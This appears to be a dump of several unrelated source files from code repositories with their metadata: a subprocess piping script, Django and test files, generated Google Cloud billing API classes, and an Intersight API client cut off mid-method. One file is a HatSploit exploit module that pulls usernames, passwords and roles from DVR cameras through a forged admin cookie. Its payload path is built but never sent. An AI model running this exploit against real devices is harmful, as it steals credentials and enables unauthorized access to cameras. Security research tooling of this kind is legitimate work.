p35 = sp.Popen(['pv', '-f', '-'],
stdin = tempfile,
stdout = sp.PIPE,
stderr = sp.PIPE,
universal_newlines=True)
p4 = sp.Popen(['gzip'],
stdin = p35.stdout, stdout=outfile)
for line in iter(p35.stderr.readline, ""):
print("line:", line.strip())
p35.wait()
p4.wait()
print("filedir:", filedir)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
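The script's central pattern is chaining `subprocess.Popen` stages so data streams between processes without materialising intermediate files. A stripped-down sketch of that shape (commands and filenames are stand-ins):

```python
import subprocess as sp

# Equivalent of: sort -k2,2n input.txt | gzip > output.gz
with open("output.gz", "wb") as outfile:
    sorter = sp.Popen(["sort", "-k2,2n", "input.txt"], stdout=sp.PIPE)
    zipper = sp.Popen(["gzip"], stdin=sorter.stdout, stdout=outfile)
    sorter.stdout.close()   # let sort receive SIGPIPE if gzip exits early
    zipper.wait()
    sorter.wait()
```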
512c1fce60003522e98e0f5f3d8278c65001a88e | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/dvr/camera_credentials_disclosure.py | 563adb10d9ee73956681611981ba57a7a4d578c0 | ["MIT"] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,120 | py |

#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
from core.lib.module import Module
from utils.http.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "DVR Camera Credentials Disclosure",
'Module': "exploit/unix/dvr/camera_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'ezelf'
],
'Description': "DVR Camera credentials disclosure.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
self.output_process("Generating payload...")
cookies = {
"uid": "admin"
}
payload = '/device.rsp?opt=user&cmd=list'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
cookies=cookies
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
try:
            json_data = json.loads(response.text)

            credentials = []
            for data in json_data["list"]:
                credentials.append((data["uid"], data["pwd"], data["role"]))
self.print_table("Credentials", ('Username', 'Password', 'Role'), *credentials)
except Exception:
self.output_error("Credentials could not be found!")
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port)
| [
"[email protected]"
] | |
84cb538f8850e3ffa7072e85d2b0228a7d713a47 | 356f3f1b7caf0ccb20cc830d40821dfb2cbda046 | /sfit/workout/doctype/workout_day/test_workout_day.py | 8696ffbb32d632dbc281ece67008a9e16deb779d | ["MIT"] | permissive | vignesharumainayagam/sfit | f4b75b9a8b2de08d0eaa4eadbcd3d5e432ffba56 | a96afbf35b0e1635e44cb5f83d7f86c83abedb8f | refs/heads/master | 2021-09-05T18:22:43.494208 | 2018-01-30T07:23:02 | 2018-01-30T07:23:02 | 104,332,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py |

# -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestWorkoutDay(unittest.TestCase):
pass
| [
"[email protected]"
] | |
1f3e82b1570f82ea3bdfef2515882a87a08ed13e | 8efe9a6c9489d798b5f5b610eb531d86924a1548 | /src/products/migrations/0030_auto_20180305_0204.py | 5a7d07b9df8306b0e3108784bcba1e778c6e7200 | [] | no_license | MarekBiczysko/naklisze_public | e8e6f7e61cdb83b74ea68862b40c061c0253767b | e53c0e8fefffbcfc3a8859976eb7b81cf6270847 | refs/heads/master | 2022-12-12T02:27:09.824803 | 2019-07-23T10:54:47 | 2019-07-23T10:54:47 | 198,410,666 | 0 | 0 | null | 2022-12-08T01:03:08 | 2019-07-23T10:46:57 | Python | UTF-8 | Python | false | false | 1,518 | py |

# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-05 01:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0029_auto_20180305_0150'),
]
operations = [
migrations.AlterField(
model_name='camera',
name='description',
field=models.TextField(default='\nA camera is an optical instrument for recording or capturing images, which may be stored locally, transmitted to another location, or both. The images may be individual still photographs or sequences of images constituting videos or movies. The camera is a remote sensing device as it senses subjects without any contact . The word camera comes from camera obscura, which means "dark chamber" and is the Latin name of the original device for projecting an image of external reality onto a flat surface. The modern photographic camera evolved from the camera obscura. The functioning of the camera is very similar to the functioning of the human eye. The first permanent photograph of a camera image was made in 1826 by Joseph Nicéphore Niépce.\n'),
),
migrations.AlterField(
model_name='camera',
name='spec_table',
field=models.TextField(blank=True, default="\nogniskowa @ 58 mm &\nkąt widzenia @ 32' szerokości &\nparametr @ wartość &\nkolejny parametr @ następna wartość &\n", max_length=300, null=True),
),
]
| [
"[email protected]"
] | |
edb41ced91b448c477e1ff798421c4a836d02c1c | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_None/trend_Lag1Trend/cycle_5/ar_/test_artificial_128_None_Lag1Trend_5__0.py | a2712b0471685b35c3361d00197c36c4f8dea080 | ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference"] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 258 | py |

import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 5, transform = "None", sigma = 0.0, exog_count = 0, ar_order = 0);

 | [
"[email protected]"
] | |
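Each file in this test grid varies only the keyword arguments of the same driver call, so sibling cases differ by parameters alone. An assumed companion example, based solely on the signature used above (the parameter values are illustrative):

```python
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art

# Same driver, different grid point: longer series, a 7-step cycle, some noise.
art.process_dataset(N=256, FREQ='D', seed=0, trendtype="Lag1Trend",
                    cycle_length=7, transform="None", sigma=0.1,
                    exog_count=0, ar_order=0)
```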
d1774ad51874a5675a3520841566cae2f5f090ea | ad5d38fce4785037c108186f17eb1c64380355ef | /sddsd/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/billingbudgets/v1/billingbudgets_v1_messages.py | 8a611f89deb6f766bb26aafda35e58789808ab8b | ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"] | permissive | saranraju90/multik8s | 75864b605a139ddb7947ed4de4ae8466bdd49acb | 428576dedef7bb9cd6516e2c1ab2714581e1137c | refs/heads/master | 2023-03-03T21:56:14.383571 | 2021-02-20T14:56:42 | 2021-02-20T14:56:42 | 339,665,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,575 | py |

"""Generated message classes for billingbudgets version v1.
The Cloud Billing Budget API stores Cloud Billing budgets, which define a
budget plan and the rules to execute as spend is tracked against that plan.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'billingbudgets'
class BillingbudgetsBillingAccountsBudgetsCreateRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsCreateRequest object.
Fields:
googleCloudBillingBudgetsV1Budget: A GoogleCloudBillingBudgetsV1Budget
resource to be passed as the request body.
parent: Required. The name of the billing account to create the budget in.
Values are of the form `billingAccounts/{billingAccountId}`.
"""
googleCloudBillingBudgetsV1Budget = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1)
parent = _messages.StringField(2, required=True)
class BillingbudgetsBillingAccountsBudgetsDeleteRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsDeleteRequest object.
Fields:
name: Required. Name of the budget to delete. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsGetRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsGetRequest object.
Fields:
name: Required. Name of budget to get. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsListRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsListRequest object.
Fields:
pageSize: Optional. The maximum number of budgets to return per page. The
default and maximum value are 100.
pageToken: Optional. The value returned by the last `ListBudgetsResponse`
which indicates that this is a continuation of a prior `ListBudgets`
call, and that the system should return the next page of data.
parent: Required. Name of billing account to list budgets under. Values
are of the form `billingAccounts/{billingAccountId}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
class BillingbudgetsBillingAccountsBudgetsPatchRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsPatchRequest object.
Fields:
googleCloudBillingBudgetsV1Budget: A GoogleCloudBillingBudgetsV1Budget
resource to be passed as the request body.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
updateMask: Optional. Indicates which fields in the provided budget to
update. Read-only fields (such as `name`) cannot be changed. If this is
not provided, then only fields with non-default values from the request
are updated. See https://developers.google.com/protocol-
buffers/docs/proto3#default for more details about default values.
"""
googleCloudBillingBudgetsV1Budget = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class GoogleCloudBillingBudgetsV1Budget(_messages.Message):
r"""A budget is a plan that describes what you expect to spend on Cloud
projects, plus the rules to execute as spend is tracked against that plan,
(for example, send an alert when 90% of the target spend is met). Currently
all plans are monthly budgets so the usage period(s) tracked are implied
(calendar months of usage back-to-back).
Fields:
amount: Required. Budgeted amount.
budgetFilter: Optional. Filters that define which resources are used to
compute the actual spend against the budget.
displayName: User data for display name in UI. The name must be less than
or equal to 60 characters.
etag: Optional. Etag to validate that the object is unchanged for a read-
modify-write operation. An empty etag will cause an update to overwrite
other changes.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
notificationsRule: Optional. Rules to apply to notifications sent based on
budget spend and thresholds.
thresholdRules: Optional. Rules that trigger alerts (notifications of
thresholds being crossed) when spend exceeds the specified percentages
of the budget.
"""
amount = _messages.MessageField('GoogleCloudBillingBudgetsV1BudgetAmount', 1)
budgetFilter = _messages.MessageField('GoogleCloudBillingBudgetsV1Filter', 2)
displayName = _messages.StringField(3)
etag = _messages.StringField(4)
name = _messages.StringField(5)
notificationsRule = _messages.MessageField('GoogleCloudBillingBudgetsV1NotificationsRule', 6)
thresholdRules = _messages.MessageField('GoogleCloudBillingBudgetsV1ThresholdRule', 7, repeated=True)
class GoogleCloudBillingBudgetsV1BudgetAmount(_messages.Message):
r"""The budgeted amount for each usage period.
Fields:
lastPeriodAmount: Use the last period's actual spend as the budget for the
present period.
specifiedAmount: A specified amount to use as the budget. `currency_code`
is optional. If specified when creating a budget, it must match the
currency of the billing account. If specified when updating a budget, it
must match the currency_code of the existing budget. The `currency_code`
is provided on output.
"""
lastPeriodAmount = _messages.MessageField('GoogleCloudBillingBudgetsV1LastPeriodAmount', 1)
specifiedAmount = _messages.MessageField('GoogleTypeMoney', 2)
class GoogleCloudBillingBudgetsV1Filter(_messages.Message):
r"""A filter for a budget, limiting the scope of the cost to calculate.
Enums:
CreditTypesTreatmentValueValuesEnum: Optional. If not set, default
behavior is `INCLUDE_ALL_CREDITS`.
Messages:
LabelsValue: Optional. A single label and value pair specifying that usage
from only this set of labeled resources should be included in the
budget. Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
Fields:
creditTypes: Optional. If Filter.credit_types_treatment is
INCLUDE_SPECIFIED_CREDITS, this is a list of credit types to be
subtracted from gross cost to determine the spend for threshold
calculations. If Filter.credit_types_treatment is **not**
INCLUDE_SPECIFIED_CREDITS, this field must be empty. See [a list of
acceptable credit type
values](https://cloud.google.com/billing/docs/how-to/export-data-
bigquery-tables#credits-type).
creditTypesTreatment: Optional. If not set, default behavior is
`INCLUDE_ALL_CREDITS`.
labels: Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
projects: Optional. A set of projects of the form `projects/{project}`,
specifying that usage from only this set of projects should be included
in the budget. If omitted, the report will include all usage for the
billing account, regardless of which project the usage occurred on. Only
zero or one project can be specified currently.
services: Optional. A set of services of the form `services/{service_id}`,
specifying that usage from only this set of services should be included
in the budget. If omitted, the report will include usage for all the
services. The service names are available through the Catalog API:
https://cloud.google.com/billing/v1/how-tos/catalog-api.
subaccounts: Optional. A set of subaccounts of the form
`billingAccounts/{account_id}`, specifying that usage from only this set
of subaccounts should be included in the budget. If a subaccount is set
to the name of the parent account, usage from the parent account will be
included. If the field is omitted, the report will include usage from
the parent account and all subaccounts, if they exist.
"""
class CreditTypesTreatmentValueValuesEnum(_messages.Enum):
r"""Optional. If not set, default behavior is `INCLUDE_ALL_CREDITS`.
Values:
CREDIT_TYPES_TREATMENT_UNSPECIFIED: This is an invalid value.
INCLUDE_ALL_CREDITS: All types of credit are subtracted from the gross
cost to determine the spend for threshold calculations.
EXCLUDE_ALL_CREDITS: All types of credit are added to the net cost to
determine the spend for threshold calculations.
INCLUDE_SPECIFIED_CREDITS: Credit types specified in the credit_types
field are subtracted from the gross cost to determine the spend for
threshold calculations.
"""
CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0
INCLUDE_ALL_CREDITS = 1
EXCLUDE_ALL_CREDITS = 2
INCLUDE_SPECIFIED_CREDITS = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not allowed.
If omitted, the report will include all labeled and unlabeled usage.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2, repeated=True)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
creditTypes = _messages.StringField(1, repeated=True)
creditTypesTreatment = _messages.EnumField('CreditTypesTreatmentValueValuesEnum', 2)
labels = _messages.MessageField('LabelsValue', 3)
projects = _messages.StringField(4, repeated=True)
services = _messages.StringField(5, repeated=True)
subaccounts = _messages.StringField(6, repeated=True)
class GoogleCloudBillingBudgetsV1LastPeriodAmount(_messages.Message):
r"""Describes a budget amount targeted to last period's spend. At this time,
the amount is automatically 100% of last period's spend; that is, there are
no other options yet. Future configuration will be described here (for
example, configuring a percentage of last period's spend).
"""
class GoogleCloudBillingBudgetsV1ListBudgetsResponse(_messages.Message):
r"""Response for ListBudgets
Fields:
budgets: List of the budgets owned by the requested billing account.
nextPageToken: If not empty, indicates that there may be more budgets that
match the request; this value should be passed in a new
`ListBudgetsRequest`.
"""
budgets = _messages.MessageField('GoogleCloudBillingBudgetsV1Budget', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class GoogleCloudBillingBudgetsV1NotificationsRule(_messages.Message):
r"""NotificationsRule defines notifications that are sent based on budget
spend and thresholds.
Fields:
disableDefaultIamRecipients: Optional. When set to true, disables default
notifications sent when a threshold is exceeded. Default notifications
are sent to those with Billing Account Administrator and Billing Account
User IAM roles for the target account.
monitoringNotificationChannels: Optional. Targets to send notifications to
when a threshold is exceeded. This is in addition to default recipients
who have billing account IAM roles. The value is the full REST resource
name of a monitoring notification channel with the form
`projects/{project_id}/notificationChannels/{channel_id}`. A maximum of
5 channels are allowed. See https://cloud.google.com/billing/docs/how-
to/budgets-notification-recipients for more details.
pubsubTopic: Optional. The name of the Pub/Sub topic where budget related
messages will be published, in the form
`projects/{project_id}/topics/{topic_id}`. Updates are sent at regular
intervals to the topic. The topic needs to be created before the budget
is created; see https://cloud.google.com/billing/docs/how-
to/budgets#manage-notifications for more details. Caller is expected to
have `pubsub.topics.setIamPolicy` permission on the topic when it's set
for a budget, otherwise, the API call will fail with PERMISSION_DENIED.
See https://cloud.google.com/billing/docs/how-to/budgets-programmatic-
notifications for more details on Pub/Sub roles and permissions.
schemaVersion: Optional. Required when NotificationsRule.pubsub_topic is
set. The schema version of the notification sent to
NotificationsRule.pubsub_topic. Only "1.0" is accepted. It represents
the JSON schema as defined in https://cloud.google.com/billing/docs/how-
to/budgets-programmatic-notifications#notification_format.
"""
disableDefaultIamRecipients = _messages.BooleanField(1)
monitoringNotificationChannels = _messages.StringField(2, repeated=True)
pubsubTopic = _messages.StringField(3)
schemaVersion = _messages.StringField(4)
class GoogleCloudBillingBudgetsV1ThresholdRule(_messages.Message):
r"""ThresholdRule contains a definition of a threshold which triggers an
alert (a notification of a threshold being crossed) to be sent when spend
goes above the specified amount. Alerts are automatically e-mailed to users
with the Billing Account Administrator role or the Billing Account User
role. The thresholds here have no effect on notifications sent to anything
configured under `Budget.all_updates_rule`.
Enums:
SpendBasisValueValuesEnum: Optional. The type of basis used to determine
if spend has passed the threshold. Behavior defaults to CURRENT_SPEND if
not set.
Fields:
spendBasis: Optional. The type of basis used to determine if spend has
passed the threshold. Behavior defaults to CURRENT_SPEND if not set.
thresholdPercent: Required. Send an alert when this threshold is exceeded.
This is a 1.0-based percentage, so 0.5 = 50%. Validation: non-negative
number.
"""
class SpendBasisValueValuesEnum(_messages.Enum):
r"""Optional. The type of basis used to determine if spend has passed the
threshold. Behavior defaults to CURRENT_SPEND if not set.
Values:
BASIS_UNSPECIFIED: Unspecified threshold basis.
CURRENT_SPEND: Use current spend as the basis for comparison against the
threshold.
FORECASTED_SPEND: Use forecasted spend for the period as the basis for
comparison against the threshold.
"""
BASIS_UNSPECIFIED = 0
CURRENT_SPEND = 1
FORECASTED_SPEND = 2
spendBasis = _messages.EnumField('SpendBasisValueValuesEnum', 1)
thresholdPercent = _messages.FloatField(2)
class GoogleProtobufEmpty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class GoogleTypeMoney(_messages.Message):
r"""Represents an amount of money with its currency type.
Fields:
currencyCode: The three-letter currency code defined in ISO 4217.
nanos: Number of nano (10^-9) units of the amount. The value must be
between -999,999,999 and +999,999,999 inclusive. If `units` is positive,
`nanos` must be positive or zero. If `units` is zero, `nanos` can be
positive, zero, or negative. If `units` is negative, `nanos` must be
negative or zero. For example $-1.75 is represented as `units`=-1 and
`nanos`=-750,000,000.
units: The whole units of the amount. For example if `currencyCode` is
`"USD"`, then 1 unit is one US dollar.
"""
currencyCode = _messages.StringField(1)
nanos = _messages.IntegerField(2, variant=_messages.Variant.INT32)
units = _messages.IntegerField(3)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"[email protected]"
] | |
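Since these are plain apitools message classes, request bodies are assembled by nesting instances. A minimal sketch composing a budget with a 90% spend alert, using only the fields defined above (the account ID and amounts are illustrative):

```python
budget = GoogleCloudBillingBudgetsV1Budget(
    displayName='engineering-monthly',
    amount=GoogleCloudBillingBudgetsV1BudgetAmount(
        specifiedAmount=GoogleTypeMoney(currencyCode='USD', units=1000),
    ),
    thresholdRules=[
        GoogleCloudBillingBudgetsV1ThresholdRule(thresholdPercent=0.9),
    ],
)
request = BillingbudgetsBillingAccountsBudgetsCreateRequest(
    parent='billingAccounts/012345-ABCDEF-678901',
    googleCloudBillingBudgetsV1Budget=budget,
)
```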
0482372da6150f93732ef9dbfe0fc9cd5bd63da0 | 0d49ae2184f2e88e4aefb423ae36578b8931e415 | /intersight/apis/hyperflex_sys_config_policy_api.py | 80f2f896c2898755c1e83ad7cac5bbd4a96f156e | ["Apache-2.0"] | permissive | sonogong777/intersight-python | 0477c7e96cdd81e1e30a188d74948b5db4e41b04 | af45333b23b0048029aeafcb0077f1d0a6ffe105 | refs/heads/master | 2021-04-30T03:29:46.680831 | 2018-02-12T20:22:10 | 2018-02-12T20:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,729 | py |

# coding: utf-8
"""
UCS Starship API
This is the UCS Starship REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class HyperflexSysConfigPolicyApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def hyperflex_sys_config_policies_get(self, **kwargs):
"""
List of hyperflexSysConfigPolicies
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool count: The $count query option allows clients to request a count of the matching resources.
:param bool inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response
:param bool tags: The 'tags' query option allows clients to request a document with tag usage summary.
:param int top: The max number of records to return
:param int skip: The number of records to skip
:param str filter: Filter criteria for records to return. A URI with a $filter System Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in $filter operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section. Query examples: $filter=Name eq 'Bob' $filter=Tags/any(t: t/Key eq 'Site') $filter=Tags/any(t: t/Key eq 'Site' and t/Value eq 'London')
:param str select: Specifies a subset of properties to return
:param str orderby: Determines what values are used to order a collection of records
:param str expand: Specify additional attributes or related records to return. Supports only 'DisplayNames' attribute now. Query examples: $expand=DisplayNames
:return: HyperflexSysConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.hyperflex_sys_config_policies_get_with_http_info(**kwargs)
else:
(data) = self.hyperflex_sys_config_policies_get_with_http_info(**kwargs)
return data
def hyperflex_sys_config_policies_get_with_http_info(self, **kwargs):
"""
List of hyperflexSysConfigPolicies
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool count: The $count query option allows clients to request a count of the matching resources.
:param bool inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response
:param bool tags: The 'tags' query option allows clients to request a document with tag usage summary.
:param int top: The max number of records to return
:param int skip: The number of records to skip
:param str filter: Filter criteria for records to return. A URI with a $filter System Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in $filter operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section. Query examples: $filter=Name eq 'Bob' $filter=Tags/any(t: t/Key eq 'Site') $filter=Tags/any(t: t/Key eq 'Site' and t/Value eq 'London')
:param str select: Specifies a subset of properties to return
:param str orderby: Determines what values are used to order a collection of records
:param str expand: Specify additional attributes or related records to return. Supports only 'DisplayNames' attribute now. Query examples: $expand=DisplayNames
:return: HyperflexSysConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['count', 'inlinecount', 'tags', 'top', 'skip', 'filter', 'select', 'orderby', 'expand']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hyperflex_sys_config_policies_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'count' in params:
query_params.append(('$count', params['count']))
if 'inlinecount' in params:
query_params.append(('$inlinecount', params['inlinecount']))
if 'tags' in params:
query_params.append(('tags', params['tags']))
if 'top' in params:
query_params.append(('$top', params['top']))
if 'skip' in params:
query_params.append(('$skip', params['skip']))
if 'filter' in params:
query_params.append(('$filter', params['filter']))
if 'select' in params:
query_params.append(('$select', params['select']))
if 'orderby' in params:
query_params.append(('$orderby', params['orderby']))
if 'expand' in params:
query_params.append(('$expand', params['expand']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/hyperflex/SysConfigPolicies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HyperflexSysConfigPolicyList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def hyperflex_sys_config_policies_moid_delete(self, moid, **kwargs):
"""
Delete an instance of hyperflexSysConfigPolicy
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.hyperflex_sys_config_policies_moid_delete(moid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
